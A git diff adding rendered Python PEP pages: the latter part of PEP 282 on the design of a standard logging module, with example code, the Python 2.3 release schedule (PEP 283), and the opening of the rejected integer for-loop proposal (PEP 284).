  • java.util.logging in JDK 1.4 (a.k.a. JSR047) [1]
  • +
  • log4j [2]
  • +
  • the Syslog package from the Protomatter project [3]
  • +
  • MAL’s mx.Log package [4]
  • +
+
+
+

Simple Example

+

This shows a very simple example of how the logging package can be +used to generate simple logging output on stderr.

+
--------- mymodule.py -------------------------------
+import logging
+log = logging.getLogger("MyModule")
+
+def doIt():
+        log.debug("Doin' stuff...")
+        #do stuff...
+        raise TypeError, "Bogus type error for testing"
+-----------------------------------------------------
+
+
+
--------- myapp.py ----------------------------------
+import mymodule, logging
+
+logging.basicConfig()
+
+log = logging.getLogger("MyApp")
+
+log.info("Starting my app")
+try:
+        mymodule.doIt()
+except Exception, e:
+        log.exception("There was a problem.")
+log.info("Ending my app")
+-----------------------------------------------------
+
+
+
$ python myapp.py
+
+INFO:MyApp: Starting my app
+DEBUG:MyModule: Doin' stuff...
+ERROR:MyApp: There was a problem.
+Traceback (most recent call last):
+        File "myapp.py", line 9, in ?
+                mymodule.doIt()
+        File "mymodule.py", line 7, in doIt
+                raise TypeError, "Bogus type error for testing"
+TypeError: Bogus type error for testing
+
+INFO:MyApp: Ending my app
+
+
+

The above example shows the default output format. All +aspects of the output format should be configurable, so that +you could have output formatted like this:

+
2002-04-19 07:56:58,174 MyModule   DEBUG - Doin' stuff...
+
+or just
+
+Doin' stuff...
+
+
+
+
+

Control Flow

+

Applications make logging calls on Logger objects. Loggers are +organized in a hierarchical namespace and child Loggers inherit +some logging properties from their parents in the namespace.

+

Logger names fit into a “dotted name” namespace, with dots +(periods) indicating sub-namespaces. The namespace of logger +objects therefore corresponds to a single tree data structure.

+
    +
  • "" is the root of the namespace
  • +
  • "Zope" would be a child node of the root
  • +
  • "Zope.ZODB" would be a child node of "Zope"
  • +
+

These Logger objects create LogRecord objects which are passed +to Handler objects for output. Both Loggers and Handlers may +use logging levels and (optionally) Filters to decide if they +are interested in a particular LogRecord. When it is necessary to +output a LogRecord externally, a Handler can (optionally) use a +Formatter to localize and format the message before sending it +to an I/O stream.

+

Each Logger keeps track of a set of output Handlers. By default +all Loggers also send their output to all Handlers of their +ancestor Loggers. Loggers may, however, also be configured to +ignore Handlers higher up the tree.

+

The APIs are structured so that calls on the Logger APIs can be +cheap when logging is disabled. If logging is disabled for a +given log level, then the Logger can make a cheap comparison test +and return. If logging is enabled for a given log level, the +Logger is still careful to minimize costs before passing the +LogRecord into the Handlers. In particular, localization and +formatting (which are relatively expensive) are deferred until the +Handler requests them.

+
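A minimal sketch of that cheap early-out, using the isEnabledFor() method and the DEBUG constant defined below; makeRecord and callHandlers are hypothetical helper names:

+
class Logger:
+    def debug(self, msg, *args, **kwargs):
+        # Cheap comparison first; formatting is deferred to Handlers.
+        if not self.isEnabledFor(DEBUG):
+            return
+        record = self.makeRecord(DEBUG, msg, args, kwargs)
+        self.callHandlers(record)
+
+
+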

The overall Logger hierarchy can also have a level associated with +it, which takes precedence over the levels of individual Loggers. +This is done through a module-level function:

+
def disable(lvl):
+    """
+    Do not generate any LogRecords for requests with a severity less
+    than 'lvl'.
+    """
+    ...
+
+
+
+
+

Levels

+

The logging levels, in increasing order of importance, are:

+
    +
  • DEBUG
  • +
  • INFO
  • +
  • WARN
  • +
  • ERROR
  • +
  • CRITICAL
  • +
+

The term CRITICAL is used in preference to FATAL, which is used by +log4j. The levels are conceptually the same - that of a serious, +or very serious, error. However, FATAL implies death, which in +Python implies a raised and uncaught exception, traceback, and +exit. Since the logging module does not enforce such an outcome +from a FATAL-level log entry, it makes sense to use CRITICAL in +preference to FATAL.

+

These are just integer constants, to allow simple comparison of +importance. Experience has shown that too many levels can be +confusing, as they lead to subjective interpretation of which +level should be applied to any particular log request.

+

Although the above levels are strongly recommended, the logging +system should not be prescriptive. Users may define their own +levels, as well as the textual representation of any levels. User +defined levels must, however, obey the constraints that they are +all positive integers and that they increase in order of +increasing severity.

+

User-defined logging levels are supported through two module-level +functions:

+
def getLevelName(lvl):
+        """Return the text for level 'lvl'."""
+        ...
+
+def addLevelName(lvl, lvlName):
+        """
+        Add the level 'lvl' with associated text 'levelName', or
+        set the textual representation of existing level 'lvl' to be
+        'lvlName'."""
+        ...
+
+
+
+
+

Loggers

+

Each Logger object keeps track of a log level (or threshold) that +it is interested in, and discards log requests below that level.

+

A Manager class instance maintains the hierarchical namespace of +named Logger objects. Generations are denoted with dot-separated +names: Logger “foo” is the parent of Loggers “foo.bar” and +“foo.baz”.

+

The Manager class instance is a singleton and is not directly +exposed to users, who interact with it using various module-level +functions.

+

The general logging method is:

+
class Logger:
+    def log(self, lvl, msg, *args, **kwargs):
+        """Log 'str(msg) % args' at logging level 'lvl'."""
+        ...
+
+
+

However, convenience functions are defined for each logging level:

+
class Logger:
+    def debug(self, msg, *args, **kwargs): ...
+    def info(self, msg, *args, **kwargs): ...
+    def warn(self, msg, *args, **kwargs): ...
+    def error(self, msg, *args, **kwargs): ...
+    def critical(self, msg, *args, **kwargs): ...
+
+
+

Only one keyword argument is recognized at present - “exc_info”. +If true, the caller wants exception information to be provided in +the logging output. This mechanism is only needed if exception +information needs to be provided at any logging level. In the +more common case, where exception information needs to be added to +the log only when errors occur, i.e. at the ERROR level, then +another convenience method is provided:

+
class Logger:
+    def exception(self, msg, *args): ...
+
+
+

This should only be called in the context of an exception handler, +and is the preferred way of indicating a desire for exception +information in the log. The other convenience methods are +intended to be called with exc_info only in the unusual situation +where you might want to provide exception information in the +context of an INFO message, for example.

+

The “msg” argument shown above will normally be a format string; +however, it can be any object x for which str(x) returns the +format string. This facilitates, for example, the use of an +object which fetches a locale-specific message for an +internationalized/localized application, perhaps using the +standard gettext module. An outline example:

+
class Message:
+    """Represents a message"""
+    def __init__(self, id):
+        """Initialize with the message ID"""
+
+    def __str__(self):
+        """Return an appropriate localized message text"""
+
+...
+
+logger.info(Message("abc"), ...)
+
+
+

Gathering and formatting data for a log message may be expensive, +and a waste if the logger was going to discard the message anyway. +To see if a request will be honoured by the logger, the +isEnabledFor() method can be used:

+
class Logger:
+    def isEnabledFor(self, lvl):
+        """
+        Return true if requests at level 'lvl' will NOT be
+        discarded.
+        """
+        ...
+
+
+

so instead of this expensive and possibly wasteful DOM to XML +conversion:

+
...
+hamletStr = hamletDom.toxml()
+log.info(hamletStr)
+...
+
+
+

one can do this:

+
if log.isEnabledFor(logging.INFO):
+    hamletStr = hamletDom.toxml()
+    log.info(hamletStr)
+
+
+

When new loggers are created, they are initialized with a level +which signifies “no level”. A level can be set explicitly using +the setLevel() method:

+
class Logger:
+    def setLevel(self, lvl): ...
+
+
+

If a logger’s level is not set, the system consults all its +ancestors, walking up the hierarchy until an explicitly set level +is found. That is regarded as the “effective level” of the +logger, and can be queried via the getEffectiveLevel() method:

+
def getEffectiveLevel(self): ...
+
+
+
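A sketch of that walk; the level and parent attribute names, and the value returned when no level is set anywhere, are assumptions:

+
def getEffectiveLevel(self):
+    logger = self
+    while logger is not None:
+        if logger.level:          # 0 is taken to mean "no level"
+            return logger.level
+        logger = logger.parent    # None above the root logger
+    return 0                      # nothing was set anywhere
+
+
+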

Loggers are never instantiated directly. Instead, a module-level +function is used:

+
def getLogger(name=None): ...
+
+
+

If no name is specified, the root logger is returned. Otherwise, +if a logger with that name exists, it is returned. If not, a new +logger is initialized and returned. Here, “name” is synonymous +with “channel name”.

+
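For example, repeated calls with the same channel name return the same singleton:

+
log = logging.getLogger("myapp.db")    # created on first use
+same = logging.getLogger("myapp.db")   # the same object is returned
+assert log is same
+root = logging.getLogger()             # no name: the root logger
+
+
+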

Users can specify a custom subclass of Logger to be used by the +system when instantiating new loggers:

+
def setLoggerClass(klass): ...
+
+
+

The passed class should be a subclass of Logger, and its __init__ +method should call Logger.__init__.

+
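A minimal sketch:

+
class AuditLogger(logging.Logger):
+    def __init__(self, name):
+        logging.Logger.__init__(self, name)
+        # custom per-logger initialization goes here
+
+logging.setLoggerClass(AuditLogger)
+log = logging.getLogger("audit")   # now an AuditLogger instance
+
+
+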
+
+

Handlers

+

Handlers are responsible for doing something useful with a given +LogRecord. The following core Handlers will be implemented:

+
    +
  • StreamHandler: A handler for writing to a file-like object.
  • +
  • FileHandler: A handler for writing to a single file or set +of rotating files.
  • +
  • SocketHandler: A handler for writing to remote TCP ports.
  • +
  • DatagramHandler: A handler for writing to UDP sockets, for +low-cost logging. Jeff Bauer already had such a system [5].
  • +
  • MemoryHandler: A handler that buffers log records in memory +until the buffer is full or a particular condition occurs +[1].
  • +
  • SMTPHandler: A handler for sending to email addresses via SMTP.
  • +
  • SysLogHandler: A handler for writing to Unix syslog via UDP.
  • +
  • NTEventLogHandler: A handler for writing to event logs on +Windows NT, 2000 and XP.
  • +
  • HTTPHandler: A handler for writing to a Web server with +either GET or POST semantics.
  • +
+

Handlers can also have levels set for them using the +setLevel() method:

+
def setLevel(self, lvl): ...
+
+
+

The FileHandler can be set up to create a rotating set of log +files. In this case, the file name passed to the constructor is +taken as a “base” file name. Additional file names for the +rotation are created by appending .1, .2, etc. to the base file +name, up to a maximum as specified when rollover is requested. +The setRollover method is used to specify a maximum size for a log +file and a maximum number of backup files in the rotation.

+
def setRollover(maxBytes, backupCount): ...
+
+
+

If maxBytes is specified as zero, no rollover ever occurs and the +log file grows indefinitely. If a non-zero size is specified, +when that size is about to be exceeded, rollover occurs. The +rollover method ensures that the base file name is always the most +recent, .1 is the next most recent, .2 the next most recent after +that, and so on.

+
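A short usage sketch; attaching the handler to a logger is shown with an assumed addHandler method:

+
h = FileHandler("app.log")
+h.setRollover(1000000, 3)   # roll over near 1 MB; keep app.log.1 .. .3
+log.addHandler(h)           # 'addHandler' is an assumed attachment name
+
+
+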

There are many additional handlers implemented in the test/example +scripts provided with [6] - for example, XMLHandler and +SOAPHandler.

+
+
+

LogRecords

+

A LogRecord acts as a receptacle for information about a +logging event. It is little more than a dictionary, though it +does define a getMessage method which merges a message with +optional runtime arguments.

+
+
+

Formatters

+

A Formatter is responsible for converting a LogRecord to a string +representation. A Handler may call its Formatter before writing a +record. The following core Formatters will be implemented:

+
    +
  • Formatter: Provide printf-like formatting, using the % operator.
  • +
  • BufferingFormatter: Provide formatting for multiple +messages, with header and trailer formatting support.
  • +
+

Formatters are associated with Handlers by calling setFormatter() +on a handler:

+
def setFormatter(self, form): ...
+
+
+

Formatters use the % operator to format the logging message. The +format string should contain %(name)x and the attribute dictionary +of the LogRecord is used to obtain message-specific data. The +following attributes are provided:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
%(name)sName of the logger (logging channel)
%(levelno)sNumeric logging level for the message (DEBUG, +INFO, WARN, ERROR, CRITICAL)
%(levelname)sText logging level for the message (“DEBUG”, “INFO”, +“WARN”, “ERROR”, “CRITICAL”)
%(pathname)sFull pathname of the source file where the logging +call was issued (if available)
%(filename)sFilename portion of pathname
%(module)sModule from which logging call was made
%(lineno)dSource line number where the logging call was issued +(if available)
%(created)fTime when the LogRecord was created (time.time() +return value)
%(asctime)sTextual time when the LogRecord was created
%(msecs)dMillisecond portion of the creation time
%(relativeCreated)dTime in milliseconds when the LogRecord was created, +relative to the time the logging module was loaded +(typically at application startup time)
%(thread)dThread ID (if available)
%(message)sThe result of record.getMessage(), computed just as +the record is emitted
+

If a formatter sees that the format string includes “%(asctime)s”, +the creation time is formatted into the LogRecord’s asctime +attribute. To allow flexibility in formatting dates, Formatters +are initialized with a format string for the message as a whole, +and a separate format string for date/time. The date/time format +string should be in time.strftime format. The default value for +the message format is “%(message)s”. The default date/time format +is ISO8601.

+

The formatter uses a class attribute, “converter”, to indicate how +to convert a time from seconds to a tuple. By default, the value +of “converter” is “time.localtime”. If needed, a different +converter (e.g. “time.gmtime”) can be set on an individual +formatter instance, or the class attribute changed to affect all +formatter instances.

+
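For example (the handler variable is assumed from context):

+
import time
+
+form = Formatter("%(asctime)s %(levelname)s %(name)s: %(message)s",
+                 "%Y-%m-%d %H:%M:%S")   # message format, date format
+form.converter = time.gmtime            # this instance logs UTC times
+handler.setFormatter(form)
+
+
+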
+
+

Filters

+

When level-based filtering is insufficient, a Filter can be called +by a Logger or Handler to decide if a LogRecord should be output. +Loggers and Handlers can have multiple filters installed, and any +one of them can veto a LogRecord being output.

+
class Filter:
+    def filter(self, record):
+        """
+        Return a value indicating true if the record is to be
+        processed.  Possibly modify the record, if deemed
+        appropriate by the filter.
+        """
+
+
+

The default behaviour allows a Filter to be initialized with a +Logger name. This will only allow through events which are +generated using the named logger or any of its children. For +example, a filter initialized with “A.B” will allow events logged +by loggers “A.B”, “A.B.C”, “A.B.C.D”, “A.B.D” etc. but not “A.BB”, +“B.A.B” etc. If initialized with the empty string, all events are +passed by the Filter. This filter behaviour is useful when it is +desired to focus attention on one particular area of an +application; the focus can be changed simply by changing a filter +attached to the root logger.

+
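For example:

+
f = Filter("A.B")        # passes "A.B", "A.B.C", ... but not "A.BB"
+handler.addFilter(f)     # 'addFilter' is an assumed installer name
+
+
+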

There are many examples of Filters provided in [6].

+
+
+

Configuration

+

The main benefit of a logging system like this is that one can +control how much and what logging output one gets from an +application without changing that application’s source code. +Therefore, although configuration can be performed through the +logging API, it must also be possible to change the logging +configuration without changing an application at all. For +long-running programs like Zope, it should be possible to change +the logging configuration while the program is running.

+

Configuration includes the following:

+
    +
  • What logging level a logger or handler should be interested in.
  • +
  • What handlers should be attached to which loggers.
  • +
  • What filters should be attached to which handlers and loggers.
  • +
  • Specifying attributes specific to certain handlers and filters.
  • +
+

In general each application will have its own requirements for how +a user may configure logging output. However, each application +will specify the required configuration to the logging system +through a standard mechanism.

+

The simplest configuration is a single handler, writing +to stderr, attached to the root logger. This configuration is set +up by calling the basicConfig() function once the logging module +has been imported.

+
def basicConfig(): ...
+
+
+

For more sophisticated configurations, this PEP makes no specific +proposals, for the following reasons:

+
    +
  • A specific proposal may be seen as prescriptive.
  • +
  • Without the benefit of wide practical experience in the +Python community, there is no way to know whether any given +configuration approach is a good one. That practice can’t +really come until the logging module is used, and that means +until after Python 2.3 has shipped.
  • +
  • There is a likelihood that different types of applications +may require different configuration approaches, so that no +“one size fits all”.
  • +
+

The reference implementation [6] has a working configuration file +format, implemented for the purpose of proving the concept and +suggesting one possible alternative. It may be that separate +extension modules, not part of the core Python distribution, are +created for logging configuration and log viewing, supplemental +handlers and other features which are not of interest to the bulk +of the community.

+
+
+

Thread Safety

+

The logging system should support thread-safe operation without +any special action needing to be taken by its users.

+
+
+

Module-Level Functions

+

To support use of the logging mechanism in short scripts and small +applications, module-level functions debug(), info(), warn(), +error(), critical() and exception() are provided. These work in +the same way as the correspondingly named methods of Logger - in +fact they delegate to the corresponding methods on the root +logger. A further convenience provided by these functions is that +if no configuration has been done, basicConfig() is automatically +called.

+
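For example, a two-line script gets sensible output with no setup:

+
import logging
+logging.warn("careful!")   # basicConfig() is called automatically
+
+
+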

At application exit, all handlers can be flushed by calling the function:

+
def shutdown(): ...
+
+
+

This will flush and close all handlers.

+
+
+

Implementation

+

The reference implementation is Vinay Sajip’s logging module [6].

+
+
+

Packaging

+

The reference implementation is implemented as a single module. +This offers the simplest interface - all users have to do is +“import logging” and they are in a position to use all the +functionality available.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0282.rst

+

Last modified: 2023-10-10 05:32:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0283/index.html new file mode 100644 index 00000000000..a20a97bdc53 --- /dev/null +++ b/pep-0283/index.html @@ -0,0 +1,383 @@ + PEP 283 – Python 2.3 Release Schedule | peps.python.org +
+
+


+ + +
+
+
+

PEP 283 – Python 2.3 Release Schedule

+
+
Author:
+
Guido van Rossum
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
27-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+
27-Feb-2002
+
+
+
+
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.3. The schedule primarily concerns itself with PEP-sized +items. Small features may be added up to and including the first +beta release. Bugs may be fixed until the final release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. Alpha and beta releases will be spaced at +least 4 weeks apart (except if an emergency release must be made +to correct a blunder in the previous release; then the blunder +release does not count). Release candidates will be spaced at +least one week apart (excepting again blunder corrections).

+ + + + + + + + + + + + + + + + + + + + + + + + +
alpha 131 Dec 2002
alpha 219 Feb 2003
beta 125 Apr 2003
beta 229 Jun 2003
candidate 118 Jul 2003
candidate 224 Jul 2003
final29 Jul 2003
+
+
+

Release Manager

+

Barry Warsaw, Jeremy Hylton, Tim Peters

+
+
+

Completed features for 2.3

+

This list is not complete. See Doc/whatsnew/whatsnew23.tex in CVS +for more, and of course Misc/NEWS for the full list.

+
    +
  • Tk 8.4 update.
  • +
  • The bool type and its constants, True and False (PEP 285).
  • +
  • PyMalloc was greatly enhanced and is enabled by default.
  • +
  • Universal newline support (PEP 278).
  • +
  • PEP 263 Defining Python Source Code Encodings, Lemburg

    Implemented (at least phase 1, which is all that’s planned for +2.3).

    +
  • +
  • Extended slice notation for all built-in sequences. The patch +by Michael Hudson is now all checked in.
  • +
  • Speed up list iterations by filling tp_iter and other tweaks. +See https://bugs.python.org/issue560736; also done for xrange and +tuples.
  • +
  • Timeout sockets. https://bugs.python.org/issue555085
  • +
  • Stage B0 of the int/long integration (PEP 237). This means +issuing a FutureWarning about situations where hex or oct +conversions or left shifts returns a different value for an int +than for a long with the same value. The semantics do not +change in Python 2.3; that will happen in Python 2.4.
  • +
  • Nuke SET_LINENO from all code objects (providing a different way +to set debugger breakpoints). This can boost pystone by >5%. +https://bugs.python.org/issue587993, now checked in. (Unfortunately +the pystone boost didn’t happen. What happened?)
  • +
  • Write a pymemcompat.h that people can bundle with their +extensions and then use the 2.3 memory interface with all +Pythons in the range 1.5.2 to 2.3. (Michael Hudson checked in +Misc/pymemcompat.h.)
  • +
  • Add a new concept, “pending deprecation”, with associated +warning PendingDeprecationWarning. This warning is normally +suppressed, but can be enabled by a suitable -W option. Only a +few things use this at this time.
  • +
  • Warn when an extension type’s tp_compare returns anything except +-1, 0 or 1. https://bugs.python.org/issue472523
  • +
  • Warn for assignment to None (in various forms).
  • +
  • PEP 218 Adding a Built-In Set Object Type, Wilson

    Alex Martelli contributed a new version of Greg Wilson’s +prototype, and I’ve reworked that quite a bit. It’s in the +standard library now as the module sets, although some details +may still change until the first beta release. (There are no +plans to make this a built-in type, for now.)

    +
  • +
  • PEP 293 Codec error handling callbacks, Dörwald

    Fully implemented. Error handling in unicode.encode or +str.decode can now be customized.

    +
  • +
  • PEP 282 A Logging System, Mick

    Vinay Sajip’s implementation has been packagized and imported. +(Documentation and unit tests still pending.) +https://bugs.python.org/issue578494

    +
  • +
  • A modified MRO (Method Resolution Order) algorithm. Consensus +is that we should adopt C3. Samuele Pedroni has contributed a +draft implementation in C, see https://bugs.python.org/issue619475 +This has now been checked in.
  • +
  • A new command line option parser. Greg Ward’s Optik package +(http://optik.sf.net) has been adopted, converted to a single +module named optparse. See also +http://www.python.org/sigs/getopt-sig/
  • +
  • A standard datetime type. This started as a wiki: +http://www.zope.org/Members/fdrake/DateTimeWiki/FrontPage. A +prototype was coded in nondist/sandbox/datetime/. Tim Peters +has finished the C implementation and checked it in.
  • +
  • PEP 273 Import Modules from Zip Archives, Ahlstrom

    Implemented as a part of the PEP 302 implementation work.

    +
  • +
  • PEP 302 New Import Hooks, JvR

    Implemented (though the 2.3a1 release contained some bugs that +have been fixed post-release).

    +
  • +
  • A new pickling protocol. See PEP 307.
  • +
  • PEP 305 (CSV File API, by Skip Montanaro et al.) is in; this is +the csv module.
  • +
  • Raymond Hettinger’s itertools module is in.
  • +
  • PEP 311 (Simplified GIL Acquisition for Extensions, by Mark +Hammond) has been included in beta 1.
  • +
  • Two new PyArg_Parse*() format codes, ‘k’ returns an unsigned C +long int that receives the lower LONG_BIT bits of the Python +argument, truncating without range checking. ‘K’ returns an +unsigned C long long int that receives the lower LONG_LONG_BIT +bits, truncating without range checking. (SF 595026; Thomas +Heller did this work.)
  • +
  • A new version of IDLE was imported from the IDLEfork project +(http://idlefork.sf.net). The code now lives in the idlelib +package in the standard library and the idle script is installed +by setup.py.
  • +
+
+
+

Planned features for 2.3

+

Too late for anything more to get done here.

+
+
+

Ongoing tasks

+

The following are ongoing TO-DO items which we should attempt to +work on without hoping for completion by any particular date.

+
    +
  • Documentation: complete the distribution and installation +manuals.
  • +
  • Documentation: complete the documentation for new-style +classes.
  • +
  • Look over the Demos/ directory and update where required (Andrew +Kuchling has done a lot of this)
  • +
  • New tests.
  • +
  • Fix doc bugs on SF.
  • +
  • Remove use of deprecated features in the core.
  • +
  • Document deprecated features appropriately.
  • +
  • Mark deprecated C APIs with Py_DEPRECATED.
  • +
  • Deprecate modules which are unmaintained, or perhaps make a new +category for modules ‘Unmaintained’
  • +
  • In general, lots of cleanup so it is easier to move forward.
  • +
+
+
+

Open issues

+

There are some issues that may need more work and/or thought +before the final release (and preferably before the first beta +release): No issues remaining.

+
+
+

Features that did not make it into Python 2.3

+
    +
  • The import lock could use some redesign. (SF 683658.)
  • +
  • Set API issues; is the sets module perfect?

    I expect it’s good enough to stop polishing it until we’ve had +more widespread user experience.

    +
  • +
  • A nicer API to open text files, replacing the ugly (in some +people’s eyes) “U” mode flag. There’s a proposal out there to +have a new built-in type textfile(filename, mode, encoding). +(Shouldn’t it have a bufsize argument too?)

    Ditto.

    +
  • +
  • New widgets for Tkinter???

    Has anyone gotten the time for this? Are there any new +widgets in Tk 8.4? Note that we’ve got better Tix support +already (though not on Windows yet).

    +
  • +
  • Fredrik Lundh’s basetime proposal:

    http://effbot.org/ideas/time-type.htm

    +

    I believe this is dead now.

    +
  • +
  • PEP 304 (Controlling Generation of Bytecode Files by Montanaro) +seems to have lost steam.
  • +
  • For a class defined inside another class, the __name__ should be +"outer.inner", and pickling should work. (SF 633930. I’m no +longer certain this is easy or even right.)
  • +
  • reST is going to be used a lot in Zope3. Maybe it could become +a standard library module? (Since reST’s author thinks it’s too +unstable, I’m inclined not to do this.)
  • +
  • Decide on a clearer deprecation policy (especially for modules) +and act on it. For a start, see this message from Neal Norwitz: +https://mail.python.org/pipermail/python-dev/2002-April/023165.html +There seems insufficient interest in moving this further in an +organized fashion, and it’s not particularly important.
  • +
  • Provide alternatives for common uses of the types module;

    Skip Montanaro has posted a proto-PEP for this idea: +https://mail.python.org/pipermail/python-dev/2002-May/024346.html

    +

    There hasn’t been any progress on this, AFAICT.

    +
  • +
  • Use pending deprecation for the types and string modules. This +requires providing alternatives for the parts that aren’t +covered yet (e.g. string.whitespace and types.TracebackType). +It seems we can’t get consensus on this.
  • +
  • Deprecate the buffer object. +

    It seems that this is never going to be resolved.

    +
  • +
  • PEP 269 Pgen Module for Python, Riehl

    (Some necessary changes are in; the pgen module itself needs to +mature more.)

    +
  • +
  • Add support for the long-awaited Python catalog. Kapil +Thangavelu has a Zope-based implementation that he demoed at +OSCON 2002. Now all we need is a place to host it and a person +to champion it. (Some changes to distutils to support this are +in, at least.)
  • +
  • PEP 266 Optimizing Global Variable/Attribute Access, Montanaro

    PEP 267 Optimized Access to Module Namespaces, Hylton

    +

    PEP 280 Optimizing access to globals, van Rossum

    +

    These are basically three friendly competing proposals. Jeremy +has made a little progress with a new compiler, but it’s going +slow and the compiler is only the first step. Maybe we’ll be +able to refactor the compiler in this release. I’m tempted to +say we won’t hold our breath. In the meantime, Oren Tirosh has +a much simpler idea that may give a serious boost to the +performance of accessing globals and built-ins, by optimizing +and inlining the dict access: http://tothink.com/python/fastnames/

    +
  • +
  • Lazily tracking tuples? +

    Not much enthusiasm I believe.

    +
  • +
  • PEP 286 Enhanced Argument Tuples, von Loewis

    I haven’t had the time to review this thoroughly. It seems a +deep optimization hack (also makes better correctness guarantees +though).

    +
  • +
  • Make ‘as’ a keyword. It has been a pseudo-keyword long enough. +Too much effort to bother.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0283.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0284/index.html new file mode 100644 index 00000000000..a3fdd65ace2 --- /dev/null +++ b/pep-0284/index.html @@ -0,0 +1,372 @@ + PEP 284 – Integer for-loops | peps.python.org +
+
+


+ + +
+
+
+

PEP 284 – Integer for-loops

+
+
Author:
+
David Eppstein <eppstein at ics.uci.edu>, +Gregory Ewing <greg.ewing at canterbury.ac.nz>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Mar-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes to simplify iteration over intervals of +integers, by extending the range of expressions allowed after a +“for” keyword to allow three-way comparisons such as

+
for lower <= var < upper:
+
+
+

in place of the current

+
for item in list:
+
+
+

syntax. The resulting loop or list iteration will loop over all +values of var that make the comparison true, starting from the +left endpoint of the given interval.

+
+
+

Pronouncement

+

This PEP is rejected. There were a number of fixable issues with +the proposal (see the fixups listed in Raymond Hettinger’s +python-dev post on 18 June 2005 [1]). However, even with the fixups the +proposal did not garner support. Specifically, Guido did not buy +the premise that the range() format needed fixing, “The whole point +(15 years ago) of range() was to avoid needing syntax to specify a +loop over numbers. I think it’s worked out well and there’s nothing +that needs to be fixed (except range() needs to become an iterator, +which it will in Python 3.0).”

+
+
+

Rationale

+

One of the most common uses of for-loops in Python is to iterate +over an interval of integers. Python provides functions range() +and xrange() to generate lists and iterators for such intervals, +which work best for the most frequent case: half-open intervals +increasing from zero. However, the range() syntax is more awkward +for open or closed intervals, and lacks symmetry when reversing +the order of iteration. In addition, the call to an unfamiliar +function makes it difficult for newcomers to Python to understand +code that uses range() or xrange().

+

The perceived lack of a natural, intuitive integer iteration +syntax has led to heated debate on python-list, and spawned at +least four PEPs before this one. PEP 204 (rejected) proposed +to re-use Python’s slice syntax for integer ranges, leading to a +terser syntax but not solving the readability problem of +multi-argument range(). PEP 212 (deferred) proposed several +syntaxes for directly converting a list to a sequence of integer +indices, in place of the current idiom

+
range(len(list))
+
+
+

for such conversion, and PEP 281 proposes to simplify the same +idiom by allowing it to be written as

+
range(list).
+
+
+

PEP 276 proposes to allow automatic conversion of integers to +iterators, simplifying the most common half-open case but not +addressing the complexities of other types of interval. +Additional alternatives have been discussed on python-list.

+

The solution described here is to allow a three-way comparison +after a “for” keyword, both in the context of a for-loop and of a +list comprehension:

+
for lower <= var < upper:
+
+
+

This would cause iteration over an interval of consecutive +integers, beginning at the left bound in the comparison and ending +at the right bound. The exact comparison operations used would +determine whether the interval is open or closed at either end and +whether the integers are considered in ascending or descending +order.

+

This syntax closely matches standard mathematical notation, so is +likely to be more familiar to Python novices than the current +range() syntax. Open and closed interval endpoints are equally +easy to express, and the reversal of an integer interval can be +formed simply by swapping the two endpoints and reversing the +comparisons. In addition, the semantics of such a loop would +closely resemble one way of interpreting the existing Python +for-loops:

+
for item in list
+
+
+

iterates over exactly those values of item that cause the +expression

+
item in list
+
+
+

to be true. Similarly, the new format

+
for lower <= var < upper:
+
+
+

would iterate over exactly those integer values of var that cause +the expression

+
lower <= var < upper
+
+
+

to be true.

+
+
+

Specification

+

We propose to extend the syntax of a for statement, currently

+
for_stmt: "for" target_list "in" expression_list ":" suite
+      ["else" ":" suite]
+
+
+

as described below:

+
for_stmt: "for" for_test ":" suite ["else" ":" suite]
+for_test: target_list "in" expression_list |
+        or_expr less_comp or_expr less_comp or_expr |
+        or_expr greater_comp or_expr greater_comp or_expr
+less_comp: "<" | "<="
+greater_comp: ">" | ">="
+
+
+

Similarly, we propose to extend the syntax of list comprehensions, +currently

+
list_for: "for" expression_list "in" testlist [list_iter]
+
+
+

by replacing it with:

+
list_for: "for" for_test [list_iter]
+
+
+

In all cases the expression formed by for_test would be subject to +the same precedence rules as comparisons in expressions. The two +comp_operators in a for_test must be required to be both of +similar types, unlike chained comparisons in expressions which do +not have such a restriction.

+

We refer to the two or_expr’s occurring on the left and right +sides of the for-loop syntax as the bounds of the loop, and the +middle or_expr as the variable of the loop. When a for-loop using +the new syntax is executed, the expressions for both bounds will +be evaluated, and an iterator object created that iterates through +all integers between the two bounds according to the comparison +operations used. The iterator will begin with an integer equal or +near to the left bound, and then step through the remaining +integers with a step size of +1 or -1 if the comparison operation +is in the set described by less_comp or greater_comp respectively. +The execution will then proceed as if the expression had been

+
for variable in iterator
+
+
+

where “variable” refers to the variable of the loop and “iterator” +refers to the iterator created for the given integer interval.

+
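A hedged generator sketch of such an iterator, covering the ascending integer case only; the function name and the strictness flags are illustrative:

+
def interval(lo, hi, lo_strict, hi_strict):
+    if lo_strict:
+        i = lo + 1            # "lo < var": start one past the bound
+    else:
+        i = lo                # "lo <= var": start at the bound
+    while i < hi or (not hi_strict and i == hi):
+        yield i
+        i += 1
+
+
+

Under this sketch, “for 5 <= var < 10:” would behave like “for var in interval(5, 10, False, True)”.

+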

The values taken by the loop variable in an integer for-loop may +be either plain integers or long integers, according to the +magnitude of the bounds. Both bounds of an integer for-loop must +evaluate to a real numeric type (integer, long, or float). Any +other value will cause the for-loop statement to raise a TypeError +exception.

+
+
+

Issues

+

The following issues were raised in discussion of this and related +proposals on the Python list.

+
    +
  • Should the right bound be evaluated once, or every time through +the loop? Clearly, it only makes sense to evaluate the left +bound once. For reasons of consistency and efficiency, we have +chosen the same convention for the right bound.
  • +
  • Although the new syntax considerably simplifies integer +for-loops, list comprehensions using the new syntax are not as +simple. We feel that this is appropriate since for-loops are +more frequent than comprehensions.
  • +
  • The proposal does not allow access to integer iterator objects +such as would be created by xrange. True, but we see this as a +shortcoming in the general list-comprehension syntax, beyond the +scope of this proposal. In addition, xrange() will still be +available.
  • +
